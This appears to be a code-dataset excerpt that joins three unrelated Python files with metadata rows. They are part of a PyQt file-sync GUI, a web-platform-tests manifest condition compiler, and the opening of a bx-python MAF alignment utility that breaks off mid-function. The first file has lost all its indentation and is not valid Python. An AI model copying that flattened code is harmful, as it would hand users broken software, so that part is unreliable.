TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], amount, TOT_CP_AMT[0], mins, secs, avg_speed))
try:
TEXT3[0] = "Copying: '%s'(%d/%d)MB %d%%\t\t\tSpeed: %dMBPS" %(CURR_NAME[0], cp_amt, CURR_SIZE[0], (cp_amt / (CURR_SIZE[0]) * 100), speed)
except:
TEXT3[0] = "Copying: '%s'(%d/%d)MB %d%%\t\t\tSpeed: %dMBPS" %(CURR_NAME[0], cp_amt, CURR_SIZE[0], 100, speed)
self.sig.prog_bar.emit()
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
time.sleep(0.5)
i = i + 1
#If Delete action is going on
if(ACTION[0] == "del1" or ACTION[0] == "del2"):
while True:
if(ACTION[0] == " "): #If delete action completed but progress is not fully updated due to time lag among two threads
if(DEL_FILE[0] == TOT_DEL_FILE[0]):
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], SIZE_COPIED[0], TOT_CP_AMT[0], mins, secs, AVG_SPEED[0]))
TEXT3[0] = "Deleting: '%s'(%d)MB\t\tDeleted: %d/%d\t\tFreed: %d/%d(MB)" %(CURR_NAME[0], CURR_SIZE[0], TOT_DEL_FILE[0], TOT_DEL_FILE[0], TOT_DEL_AMT[0], TOT_DEL_AMT[0])
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
return
PRE_TIME[0] = PRE_TIME[0] + 0.25
mins = PRE_TIME[0] / 60
secs = PRE_TIME[0] % 60
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], SIZE_COPIED[0], TOT_CP_AMT[0], mins, secs, AVG_SPEED[0]))
TEXT3[0] = "Deleting: '%s'(%d)MB\t\tDeleted: %d/%d\t\tFreed: %d/%d(MB)" %(CURR_NAME[0], CURR_SIZE[0], DEL_FILE[0], TOT_DEL_FILE[0], SIZE_DEL[0], TOT_DEL_AMT[0])
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
time.sleep(0.25)
"""
BOX_TEXT is a pipe to which texts are pushed
and this function flush them to Text Browser
"""
def update_text1(self):
self.text_box.append("<font size = 3>" + BOX_TEXT[0] + "</font>")
BOX_TEXT.remove(BOX_TEXT[0])
self.text_box.moveCursor(QTextCursor.End)
"""
Handler for progress label signal
"""
def update_proglab(self):
self.progress_text.setText(TEXT2[0])
"""
Handler for Progress Bar Signal
"""
def update_progbar(self):
self.pbar.setValue(VAL[0])
"""
Handler for Status Bar Signal
"""
def update_statbar(self):
central.status.showMessage(TEXT3[0])
"""
Log Window
"""
def log(self):
view_log = log_window()
view_log.setWindowTitle("Log File")
view_log.resize(900, 650)
pal = QPalette()
pal.setColor(QPalette.Background, Qt.white)
view_log.setPalette(pal)
view_log.exec_()
"""
Map dock2 file object and dock3 file object
"""
def make_mapping(self, action):
if(action == "copy"):
right_list = right_cp_obj
left_obj_map = cp_map
left_list = left_cp_obj
left_map = left_cp_flist
right_map = right_cp_flist
if(action == "del"):
right_list = right_del_obj
left_obj_map = del_map
left_list = left_del_obj
left_map = left_del_flist
right_map = right_del_flist
#right_map.clear()
#left_map.clear()
clear_list([right_map, left_map])
#Keeping only file object for dock3
i = 0
size = len(right_list)
while(i < size):
if(right_list[i][2] == 0):
right_map.append(right_list[i][0])
i = i + 1
#Keeping only file objects for dock2
tot_files = len(right_map)
for i in range(tot_files):
left_map.append(" ")
out_len = len(left_obj_map)
outer = 0
while(outer < out_len):
in_len = len(left_obj_map[outer])
inner = 1
while(inner < in_len):
ind = left_obj_map[outer][inner]
ele = left_list[outer][inner]
left_map[ind] = ele
inner = inner + 1
outer = outer + 1
#The Fetch Function
def on_fetch(self, fetch_list):
"""
Initialize environment variables for progress updates
"""
TOT_DEL_FILE[0] = 0
TOT_DEL_AMT[0] = 0
TOT_CP_FILE[0] = 0
TOT_CP_AMT[0] = 0
for item in fetch_list:
tar_name = item['target']
source_name = item['source']
#Temporary List for storing file paths and directory paths
tmp_tcp_dir = []
tmp_tcp_file = []
tmp_scp_dir = []
tmp_scp_file = []
tmp_cp_file_from = []
tmp_cp_dir_from = []
tmp_file2cp = []
tmp_dir2cp = []
tmp_file2del = []
tmp_dir2del = []
tmp_col_src = []
tmp_col_tar = []
empty = []
#Above temporary lists which are required to be cleared before next making list operation
tmp_list_name = [empty, tmp_col_src, tmp_col_tar, tmp_tcp_dir, tmp_tcp_file, tmp_scp_dir, tmp_scp_file, tmp_cp_file_from, tmp_cp_dir_from, tmp_file2cp, tmp_dir2cp, tmp_file2del, tmp_dir2del]
"""
Making File List For COPYING operation
Function in sync file
"""
make_list(self, item, tmp_tcp_dir, tmp_tcp_file, tmp_scp_dir, tmp_scp_file, tmp_cp_file_from, tmp_cp_dir_from, "copy")
#Find Directories to be copied
onfetch(self, tmp_scp_dir, tmp_tcp_dir, tmp_dir2cp, tmp_cp_dir_from, empty, "copy")
s = len(tmp_dir2cp)
i = 0
while(i < s):
dir2cp.append(tar_name + tmp_dir2cp[i][1:]) #Append to main lists
i = i + 1
#Find Files to be copied
onfetch(self, tmp_scp_file, tmp_tcp_file, tmp_file2cp, tmp_cp_file_from, tmp_col_src, "copy")
s = len(tmp_cp_file_from)
i = 0
while(i < s):
file2cp.append(tar_name + tmp_file2cp[i][1:]) #Append to main list
cp_file_from.append(tmp_cp_file_from[i]) #Append to main list
i = i + 1
i = 0
col_len = len(tmp_col_src)
while(i < col_len):
col_cp_src.append(tmp_col_src[i]) #Append Collision File To Main List
i = i + 1
i = 0
while(i < len(tmp_list_name)):
#tmp_list_name[i].clear() #Clear temporary lists to make delete list
clear_list([tmp_list_name[i]]);
i = i + 1
#Store sizes in env_progress variables
TOT_CP_FILE[0] = TOT_CP_FILE[0] + s
"""
Make list of file paths and directory pathsfor delete operation
"""
make_list(self, item, tmp_tcp_dir, tmp_tcp_file, tmp_scp_dir, tmp_scp_file, tmp_cp_file_from, tmp_cp_dir_from, "del")
#Find Directories to be deleted
onfetch(self, tmp_scp_dir, tmp_tcp_dir, tmp_dir2del, tmp_cp_dir_from, empty, "del")
s = len(tmp_cp_dir_from)
i = 0
while(i < s):
del_dir_from.append(tmp_cp_dir_from[i]) #Append to main list
i = i + 1
#Find Files to be deleted
onfetch(self, tmp_scp_file, tmp_tcp_file, tmp_file2del, tmp_cp_file_from, empty, "del")
s = len(tmp_cp_file_from)
i = 0
while(i < s):
del_file_from.append(tmp_cp_file_from[i]) #Append to main list
i = i + 1
TOT_DEL_FILE[0] = TOT_DEL_FILE[0] + s
class central(QMainWindow):
def __init__(self):
super(central, self).__init__()
"""
Start handling dock3 treewidget signal
-1: TreeWidget not Created
0: Creating TreeWidget, No Signal Processed
2: TreeWidget Created, Signal will be processed
"""
central.start_handle2 = -1
self.init_menubar()
self.init_statusbar()
self.dock()
self.def_central() #Set Centre Widgets
def make_connection(self, text, icon = None, shortcut = None, statustip = "", check = False, connect = None):
action = QAction(text, self)
if (icon is not None):
action.setIcon(QIcon(icon))
if (shortcut is not None):
action.setShortcut(shortcut)
if (statustip is not None):
action.setStatusTip(statustip)
action.setToolTip(statustip)
if (check):
action.setCheckable(True)
if (connect is not None):
action.triggered.connect(connect)
return action
def init_menubar(self):
menubar = self.menuBar()
reset = menubar.addMenu("&Reset")
reload = self.make_connection("Delete Locations", "icon.png", "ctrl+d", "Reset Locations", False, self.reset_loc)
del_log = self.make_connection("Delete Logs", "icon.png", "ctrl+h", "Delete History", False, self.reset_history)
self.add_submenu(reset, (reload, del_log))
helpme = menubar.addMenu("&Help")
about = self.make_connection("About", "icon.png", "ctrl+a", "About", False, self.about)
sync_help = self.make_connection("Help", "icon.png", "ctrl+h", "View Help", False, self.help)
visit = self.make_connection("Visit Web", "icon.png", "ctrl+v", "Visit Web", False, self.visit)
self.add_submenu(helpme, (about, sync_help, visit))
def init_statusbar(self):
central.status = self.statusBar()
set_style(central.status, "status_bar")
def dock(self):
self.log_dock = QDockWidget()
self.log_dock.setMinimumWidth(300)
self.log_dock.setFeatures(QDockWidget.NoDockWidgetFeatures)
self.log_dock.setObjectName("Log Dock")
self.log_dock.setAllowedAreas(Qt.RightDockWidgetArea)
self.addDockWidget(Qt.RightDockWidgetArea, self.log_dock)
set_style(self.log_dock, "log_dock")
central.tree = QTreeWidget()
central.tree.setFocusPolicy(Qt.NoFocus)
set_style(central.tree, "tree")
self.tree.setHeaderLabels(["Files To Be Copied"])
self.tree.setHeaderHidden(True)
self.tree.setColumnCount(1)
central.tree.itemChanged.connect(lambda ob = self : self.right_tick_handle(ob, "copy"))
central.del_tree = QTreeWidget()
central.del_tree.setFocusPolicy(Qt.NoFocus)
set_style(central.del_tree, "tree")
self.tree.setHeaderLabels(["Files To Be Deleted"])
self.del_tree.setHeaderHidden(True)
central.del_tree.itemChanged.connect(lambda ob = self : self.right_tick_handle(ob, "del"))
tab = QTabWidget()
tab.setFocusPolicy(Qt.NoFocus)
tab1 = QWidget()
tab2 = QWidget()
set_style(tab, "tab")
tab.addTab(tab1, "Files 2 Copy")
tab.addTab(tab2, "Files 2 Delete")
set_style(tab, "right_tab")
self.log_dock.setWidget(tab)
cp_grid = QGridLayout()
del_grid = QGridLayout()
cp_grid.addWidget(self.tree, 0, 0)
del_grid.addWidget(self.del_tree, 0, 0)
tab1.setLayout(cp_grid)
tab2.setLayout(del_grid)
#Add submenu to Menu
def add_submenu(self, menu, submenu):
for item in submenu:
if (item is None):
menu.addSeparator()
if (item):
menu.addAction(item)
#Delete Location Dictionaries and all settings related to them
def reset_loc(self):
#Pickled Files
files = ['all_list.p', 'list_name.p', 'top_check.p', 'left_check.p']
msg = "This Action Results\n"
for item in files:
msg = msg + "Delete '" + str(item) + "'\n"
reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if(reply == QMessageBox.No):
return
os.chdir(curr)
for item in files:
try:
os.remove(item)
except:
pass
#Delete All Log Files
def reset_history(self):
files = []
#Find Log Files
os.chdir(log_dir)
for item in os.listdir('.'):
files.append(item)
msg = "This Action Results\n"
for item in files:
msg = msg + "Delete '" + str(item) + "'\n"
#Confirm Action
reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if(reply == QMessageBox.No):
return
for item in files:
try:
os.remove(item) #Delete Files
except:
pass
os.chdir(curr)
#Handler For About Menu
def about(self):
QMessageBox.about(self, "About Us", about_text)
#Handler for Help Menu
def help(self):
webbrowser.open_new(help_link)
#Handler for visit menu
def visit(self):
webbrowser.open_new(visit_link)
#Set Centre Widget for Main Window
def def_central(self):
centre_widget = centre()
#self.central_frame.setWidget(centre_widget)
self.setCentralWidget(centre_widget)
"""
Lock or Unlock Dock3 when File Acions going on
"""
def lock_right(self, action):
if(action == "lock"):
central.tree.setDisabled(True)
central.del_tree.setDisabled(True)
if(action == "unlock"):
central.tree.setEnabled(True)
central.del_tree.setEnabled(True)
def update_right_dock(self, file_list, action):
central.start_handle2 = 0
if(action == "del"):
tree = central.del_tree
#right_del_obj.clear()
#right_del_obj = []
clear_list([right_del_obj]);
if(action == "copy"):
tree = central.tree
#right_cp_obj.clear()
#right_cp_obj = []
clear_list([right_cp_obj]);
obj_list = []
maps = []
level = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] #Stores Maximum and Current Levels For The TreeWidget
level_name = ["", "", "", "", "", "", "", "", "", "", "", "", "", ""] #Stores Previous File Path To Compare before adding file or folder to tree
tree.clear()
prev = ""
tot_len = 2
p = 0
for file in file_list:
if(os.path.isdir(file)):
is_file = 0
else:
is_file = 1
tmp_map = []
file = file[1:]
abs_path = file.split('/')
abs_path_len = len(abs_path)
filename = abs_path[-1]
if(prev == file[:tot_len - 1]):
#print("LOOOOOOOOOOOOP ------ 1")
while (i < abs_path_len - 1):
level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
tmp_map.append(level[level_counter + 1])
tmp_map.append(level_counter + 1)
tmp_map.append(1)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter + 1].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter + 1])
level_counter = level_counter + 1
level_name[i] = abs_path[i]
i = i + 1
level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
tmp_map.append(level[level_counter + 1])
tmp_map.append(level_counter + 1)
tmp_map.append(0)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter + 1].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter + 1])
file_len = len(filename)
tot_len = len(file) - file_len
prev = file[:tot_len - 1]
continue
len2 = len(level_name)
k = 0
while k < abs_path_len and k < len2:
if (level_name[k] == abs_path[k]):
k = k + 1
continue
break
level_counter = k + 1
i = level_counter - 1
while k < abs_path_len:
level_name[k] = abs_path[k]
k = k + 1
if level_counter > 1:
#print("LOOOOOOOOOOOOP ------ 2")
if(i == abs_path_len - 1):
level_counter = level_counter - 1
while i < abs_path_len - 1:
level[level_counter] = QTreeWidgetItem(level[level_counter - 1], [abs_path[i]])
tmp_map.append(level[level_counter])
tmp_map.append(level_counter)
tmp_map.append(1)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter])
level_counter = level_counter + 1
level_name[i] = abs_path[i]
i = i + 1
if i == abs_path_len - 1:
level_counter = level_counter - 1
level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
tmp_map.append(level[level_counter + 1])
tmp_map.append(level_counter + 1)
tmp_map.append(0)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter + 1].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter + 1])
file_len = len(filename)
tot_len = len(file) - file_len
prev = file[:tot_len - 1]
continue
if(abs_path_len == 1):
level[level_counter + 1] = QTreeWidgetItem(tree, [abs_path[i]])
tmp_map.append(level[level_counter + 1])
tmp_map.append(level_counter + 1)
tmp_map.append(0)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter + 1].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter + 1])
continue
i = 1
#print("LOOOOOOOOOOOOP ------ 3")
level[level_counter] = QTreeWidgetItem(tree, [abs_path[0]])
tmp_map.append(level[level_counter])
tmp_map.append(level_counter)
tmp_map.append(1)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter])
level_name[level_counter - 1] = abs_path[0]
while i < abs_path_len - 1:
level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
tmp_map.append(level[level_counter + 1])
tmp_map.append(level_counter + 1)
tmp_map.append(1)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter + 1].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter + 1])
level_counter = level_counter + 1
level_name[i] = abs_path[i]
if i == abs_path_len - 1:
level_counter = level_counter - 1
i = i + 1
level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
tmp_map.append(level[level_counter + 1])
tmp_map.append(level_counter + 1)
tmp_map.append(0)
obj_list.append(tmp_map)
tmp_map = []
level[level_counter + 1].setCheckState(0, Qt.Checked)
tree.expandItem(level[level_counter + 1])
level_name[i] = abs_path[i]
file_len = len(filename)
tot_len = len(file) - file_len
prev = file[:tot_len - 1]
p = p + 1
if(action == "copy"):
for item in obj_list:
right_cp_obj.append(item)
if(action == "del"):
for item in obj_list:
right_del_obj.append(item)
central.start_handle2 = 2
#Handler for Dock3 TreeWidgets
def right_tick_handle(self, ob, action):
if(central.start_handle2 == 2):
if(action == "copy"):
tree = central.tree
obj_list = right_cp_obj
if(action == "del"):
tree = central.del_tree
obj_list = right_del_obj
tree.blockSignals(True)
pointer = 0
list_len = len(obj_list)
while(pointer < list_len):
if(ob == obj_list[pointer][0]):
break
pointer = pointer + 1
#It Is Folder
if(obj_list[pointer][2] == 1):
if(obj_list[pointer][0].checkState(0) == Qt.Checked):
i = pointer + 1
while(i < list_len and obj_list[i][1] > obj_list[pointer][1]):
obj_list[i][0].setCheckState(0, Qt.Checked)
if(obj_list[i][2] == 0):
self.handle_left(obj_list[i][0], action)
i = i + 1
i = pointer - 1
level = obj_list[pointer][1]
while(i >= 0):
if(obj_list[i][1] < level and obj_list[i][2] == 1):
obj_list[i][0].setCheckState(0, Qt.Checked)
level = obj_list[i][1]
i = i - 1
if(obj_list[pointer][0].checkState(0) == Qt.Unchecked):
i = pointer + 1
while(i < list_len and obj_list[i][1] > obj_list[pointer][1]):
obj_list[i][0].setCheckState(0, Qt.Unchecked)
if(obj_list[i][2] == 0):
self.handle_left(obj_list[i][0], action)
i = i + 1
i = pointer - 1
while(i >= 0):
flag = 0
i = pointer + 1
while(i < list_len and obj_list[i][1] >= obj_list[pointer][1]):
if(obj_list[i][0].checkState(0) == Qt.Checked):
flag = 1
break
i = i + 1
i = pointer - 1
while(i >= 0 and obj_list[i][1] >= obj_list[pointer][1]):
if(obj_list[i][0].checkState(0) == Qt.Checked):
flag = 1
break
i = i - 1
if(not flag):
if(i >= 0):
obj_list[i][0].setCheckState(0, Qt.Unchecked)
pointer = i
continue
if(flag):
break
#It Is File
if(obj_list[pointer][2] == 0):
if(obj_list[pointer][0].checkState(0) == Qt.Checked):
i = pointer - 1
level = obj_list[pointer][1]
while(i >= 0):
if(obj_list[i][1] < level and obj_list[i][2] == 1):
obj_list[i][0].setCheckState(0, Qt.Checked)
level = obj_list[i][1]
i = i - 1
if(obj_list[pointer][0].checkState(0) == Qt.Unchecked):
i = pointer - 1
while(i >= 0):
flag = 0
i = pointer + 1
while(i < list_len and obj_list[i][1] >= obj_list[pointer][1]):
if(obj_list[i][0].checkState(0) == Qt.Checked):
flag = 1
break
i = i + 1
i = pointer - 1
while(i >= 0 and obj_list[i][1] >= obj_list[pointer][1]):
if(obj_list[i][0].checkState(0) == Qt.Checked):
flag = 1
break
i = i - 1
if(not flag):
if(i >= 0):
obj_list[i][0].setCheckState(0, Qt.Unchecked)
pointer = i
continue
if(flag):
break
self.handle_left(ob, action)
tree.blockSignals(False)
#Reflect change to Tree in Dock2
def handle_left(self, ob, action):
if(action == "copy"):
left = left_cp_flist
right = right_cp_flist
if(action == "del"):
left = left_del_flist
right = right_del_flist
i = 0
size = len(right)
while(i < size):
if(right[i] == ob): #Find Index of object
break
i = i + 1
if(right[i].checkState(0) == Qt.Checked):
left[i].setCheckState(0, Qt.Checked)
if(right[i].checkState(0) == Qt.Unchecked):
left[i].setCheckState(0, Qt.Unchecked)
| AsitRout/Syncer | main_window.py | Python | gpl-2.0 | 63,804 | [
"VisIt"
] | 9629c8f5bf01a3797ca160869d1e322e1cd764e1efe1ff8810dd4d388e3846fd |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import operator
from ..node import NodeVisitor, DataNode, ConditionalNode, KeyValueNode, ListNode, ValueNode
from ..parser import parse
class ConditionalValue(object):
def __init__(self, node, condition_func):
self.node = node
self.condition_func = condition_func
if isinstance(node, ConditionalNode):
assert len(node.children) == 2
self.condition_node = self.node.children[0]
self.value_node = self.node.children[1]
else:
assert isinstance(node, (ValueNode, ListNode))
self.condition_node = None
self.value_node = self.node
@property
def value(self):
if isinstance(self.value_node, ValueNode):
return self.value_node.data
else:
return [item.data for item in self.value_node.children]
@value.setter
def value(self, value):
self.value_node.data = value
def __call__(self, run_info):
return self.condition_func(run_info)
def set_value(self, value):
self.value = value
def remove(self):
if len(self.node.parent.children) == 1:
self.node.parent.remove()
self.node.remove()
class Compiler(NodeVisitor):
def compile(self, tree, data_cls_getter=None, **kwargs):
"""Compile a raw AST into a form where conditional expressions
are represented by ConditionalValue objects that can be evaluated
at runtime.
tree - The root node of the wptmanifest AST to compile
data_cls_getter - A function taking two parameters; the previous
output node and the current ast node and returning
the class of the output node to use for the current
ast node
"""
if data_cls_getter is None:
self.data_cls_getter = lambda x, y: ManifestItem
else:
self.data_cls_getter = data_cls_getter
self.tree = tree
self.output_node = self._initial_output_node(tree, **kwargs)
self.visit(tree)
assert self.output_node is not None
return self.output_node
def compile_condition(self, condition):
"""Compile a ConditionalNode into a ConditionalValue.
condition: A ConditionalNode"""
data_node = DataNode()
key_value_node = KeyValueNode()
key_value_node.append(condition.copy())
data_node.append(key_value_node)
manifest_item = self.compile(data_node)
return manifest_item._data[None][0]
def _initial_output_node(self, node, **kwargs):
return self.data_cls_getter(None, None)(node, **kwargs)
def visit_DataNode(self, node):
if node != self.tree:
output_parent = self.output_node
self.output_node = self.data_cls_getter(self.output_node, node)(node)
else:
output_parent = None
assert self.output_node is not None
for child in node.children:
self.visit(child)
if output_parent is not None:
# Append to the parent *after* processing all the node data
output_parent.append(self.output_node)
self.output_node = self.output_node.parent
assert self.output_node is not None
def visit_KeyValueNode(self, node):
key_values = []
for child in node.children:
condition, value = self.visit(child)
key_values.append(ConditionalValue(child, condition))
self.output_node._add_key_value(node, key_values)
def visit_ListNode(self, node):
return (lambda x:True, [self.visit(child) for child in node.children])
def visit_ValueNode(self, node):
return (lambda x: True, node.data)
def visit_ConditionalNode(self, node):
return self.visit(node.children[0]), self.visit(node.children[1])
def visit_StringNode(self, node):
indexes = [self.visit(child) for child in node.children]
def value(x):
rv = node.data
for index in indexes:
rv = rv[index(x)]
return rv
return value
def visit_NumberNode(self, node):
if "." in node.data:
return lambda x: float(node.data)
else:
return lambda x: int(node.data)
def visit_VariableNode(self, node):
indexes = [self.visit(child) for child in node.children]
def value(x):
data = x[node.data]
for index in indexes:
data = data[index(x)]
return data
return value
def visit_IndexNode(self, node):
assert len(node.children) == 1
return self.visit(node.children[0])
def visit_UnaryExpressionNode(self, node):
assert len(node.children) == 2
operator = self.visit(node.children[0])
operand = self.visit(node.children[1])
return lambda x: operator(operand(x))
def visit_BinaryExpressionNode(self, node):
assert len(node.children) == 3
operator = self.visit(node.children[0])
operand_0 = self.visit(node.children[1])
operand_1 = self.visit(node.children[2])
assert operand_0 is not None
assert operand_1 is not None
return lambda x: operator(operand_0(x), operand_1(x))
def visit_UnaryOperatorNode(self, node):
return {"not": operator.not_}[node.data]
def visit_BinaryOperatorNode(self, node):
return {"and": operator.and_,
"or": operator.or_,
"==": operator.eq,
"!=": operator.ne}[node.data]
class ManifestItem(object):
def __init__(self, node=None, **kwargs):
self.node = node
self.parent = None
self.children = []
self._data = {}
def __repr__(self):
return "<ManifestItem %s>" % (self.node.data)
def __str__(self):
rv = [repr(self)]
for item in self.children:
rv.extend(" %s" % line for line in str(item).split("\n"))
return "\n".join(rv)
@property
def is_empty(self):
if self._data:
return False
return all(child.is_empty for child in self.children)
@property
def root(self):
node = self
while node.parent is not None:
node = node.parent
return node
@property
def name(self):
return self.node.data
def has_key(self, key):
for node in [self, self.root]:
if key in node._data:
return True
return False
def get(self, key, run_info=None):
if run_info is None:
run_info = {}
for node in [self, self.root]:
if key in node._data:
for cond_value in node._data[key]:
try:
matches = cond_value(run_info)
except KeyError:
matches = False
if matches:
return cond_value.value
raise KeyError
def set(self, key, value, condition=None):
# First try to update the existing value
if key in self._data:
cond_values = self._data[key]
for cond_value in cond_values:
if cond_value.condition_node == condition:
cond_value.value = value
return
# If there isn't a conditional match reuse the existing KeyValueNode as the
# parent
node = None
for child in self.node.children:
if child.data == key:
node = child
break
assert node is not None
else:
node = KeyValueNode(key)
self.node.append(node)
value_node = ValueNode(value)
if condition is not None:
conditional_node = ConditionalNode()
conditional_node.append(condition)
conditional_node.append(value_node)
node.append(conditional_node)
cond_value = Compiler().compile_condition(conditional_node)
else:
node.append(value_node)
cond_value = ConditionalValue(value_node, lambda x: True)
# Update the cache of child values. This is pretty annoying and maybe
# it should just work directly on the tree
if key not in self._data:
self._data[key] = []
if self._data[key] and self._data[key][-1].condition_node is None:
self._data[key].insert(len(self._data[key]) - 1, cond_value)
else:
self._data[key].append(cond_value)
def _add_key_value(self, node, values):
"""Called during construction to set a key-value node"""
self._data[node.data] = values
def append(self, child):
self.children.append(child)
child.parent = self
if child.node.parent != self.node:
self.node.append(child.node)
return child
def remove(self):
if self.parent:
self.parent._remove_child(self)
def _remove_child(self, child):
self.children.remove(child)
child.parent = None
def iterchildren(self, name=None):
for item in self.children:
if item.name == name or name is None:
yield item
def _flatten(self):
rv = {}
for node in [self, self.root]:
for name, value in node._data.iteritems():
if name not in rv:
rv[name] = value
return rv
def iteritems(self):
for item in self._flatten().iteritems():
yield item
def iterkeys(self):
for item in self._flatten().iterkeys():
yield item
def remove_value(self, key, value):
self._data[key].remove(value)
if not self._data[key]:
del self._data[key]
value.remove()
def compile_ast(ast, data_cls_getter=None, **kwargs):
return Compiler().compile(ast, data_cls_getter=data_cls_getter, **kwargs)
def compile(stream, data_cls_getter=None, **kwargs):
return compile_ast(parse(stream),
data_cls_getter=data_cls_getter,
**kwargs)
| zhangjunlei26/servo | tests/wpt/harness/wptrunner/wptmanifest/backends/conditional.py | Python | mpl-2.0 | 10,439 | [
"VisIt"
] | d39a2da1de01136de6d98bf1f61362684a19a919bae5e2233ae92e20b3c595c5 |
#!/usr/bin/env python
"""
Provides wrappers and utilities for working with MAF files and alignments.
"""
#Dan Blankenberg
import pkg_resources; pkg_resources.require( "bx-python" )
import bx.align.maf
import bx.intervals
import bx.interval_index_file
import sys, os, string, tempfile
import logging
from errno import EMFILE
import resource
from copy import deepcopy
assert sys.version_info[:2] >= ( 2, 4 )
log = logging.getLogger(__name__)
GAP_CHARS = [ '-' ]
SRC_SPLIT_CHAR = '.'
def src_split( src ):
fields = src.split( SRC_SPLIT_CHAR, 1 )
spec = fields.pop( 0 )
if fields:
chrom = fields.pop( 0 )
else:
chrom = spec
return spec, chrom
def src_merge( spec, chrom, contig = None ):
if None in [ spec, chrom ]:
spec = chrom = spec or chrom
return bx.align.maf.src_merge( spec, chrom, contig )
def get_species_in_block( block ):
species = []
for c in block.components:
spec, chrom = src_split( c.src )
if spec not in species:
species.append( spec )
return species
def tool_fail( msg = "Unknown Error" ):
print >> sys.stderr, "Fatal Error: %s" % msg
sys.exit()
class TempFileHandler( object ):
'''
Handles creating, opening, closing, and deleting of Temp files, with a
maximum number of files open at one time.
'''
DEFAULT_MAX_OPEN_FILES = max( resource.getrlimit( resource.RLIMIT_NOFILE )[0] / 2, 1 )
def __init__( self, max_open_files=None, **kwds ):
if max_open_files is None:
max_open_files = self.DEFAULT_MAX_OPEN_FILES
self.max_open_files = max_open_files
self.files = []
self.open_file_indexes = []
self.kwds = kwds
def get_open_tempfile( self, index=None, **kwds ):
if index is not None and index in self.open_file_indexes:
self.open_file_indexes.remove( index )
else:
if self.max_open_files:
while len( self.open_file_indexes ) >= self.max_open_files:
self.close( self.open_file_indexes[0] )
if index is None:
index = len( self.files )
temp_kwds = dict( self.kwds )
temp_kwds.update( kwds )
# Being able to use delete=True here, would simplify a bit,
# but we support python2.4 in these tools
while True:
try:
tmp_file = tempfile.NamedTemporaryFile( **temp_kwds )
filename = tmp_file.name
break
except OSError, e:
if self.open_file_indexes and e.errno == EMFILE:
self.max_open_files = len( self.open_file_indexes )
self.close( self.open_file_indexes[0] )
else:
raise e
tmp_file.close()
self.files.append( open( filename, 'w+b' ) )
else:
while True:
try:
self.files[ index ] = open( self.files[ index ].name, 'r+b' )
break
except OSError, e:
if self.open_file_indexes and e.errno == EMFILE:
self.max_open_files = len( self.open_file_indexes )
self.close( self.open_file_indexes[0] )
else:
raise e
self.files[ index ].seek( 0, 2 )
self.open_file_indexes.append( index )
return index, self.files[ index ]
def close( self, index, delete=False ):
if index in self.open_file_indexes:
self.open_file_indexes.remove( index )
rval = self.files[ index ].close()
if delete:
try:
os.unlink( self.files[ index ].name )
except OSError:
pass
return rval
def flush( self, index ):
if index in self.open_file_indexes:
self.files[ index ].flush()
def __del__( self ):
for i in xrange( len( self.files ) ):
self.close( i, delete=True )
#an object corresponding to a reference layered alignment
class RegionAlignment( object ):
DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
MAX_SEQUENCE_SIZE = sys.maxint #Maximum length of sequence allowed
def __init__( self, size, species = [], temp_file_handler = None ):
assert size <= self.MAX_SEQUENCE_SIZE, "Maximum length allowed for an individual sequence has been exceeded (%i > %i)." % ( size, self.MAX_SEQUENCE_SIZE )
self.size = size
if not temp_file_handler:
temp_file_handler = TempFileHandler()
self.temp_file_handler = temp_file_handler
self.sequences = {}
if not isinstance( species, list ):
species = [species]
for spec in species:
self.add_species( spec )
#add a species to the alignment
def add_species( self, species ):
#make temporary sequence files
file_index, fh = self.temp_file_handler.get_open_tempfile()
self.sequences[species] = file_index
fh.write( "-" * self.size )
#returns the names for species found in alignment, skipping names as requested
def get_species_names( self, skip = [] ):
if not isinstance( skip, list ): skip = [skip]
names = self.sequences.keys()
for name in skip:
try: names.remove( name )
except: pass
return names
#returns the sequence for a species
def get_sequence( self, species ):
file_index, fh = self.temp_file_handler.get_open_tempfile( self.sequences[species] )
fh.seek( 0 )
return fh.read()
#returns the reverse complement of the sequence for a species
def get_sequence_reverse_complement( self, species ):
complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
complement.reverse()
return "".join( complement )
#sets a position for a species
def set_position( self, index, species, base ):
if len( base ) != 1: raise Exception( "A genomic position can only have a length of 1." )
return self.set_range( index, species, base )
#sets a range for a species
def set_range( self, index, species, bases ):
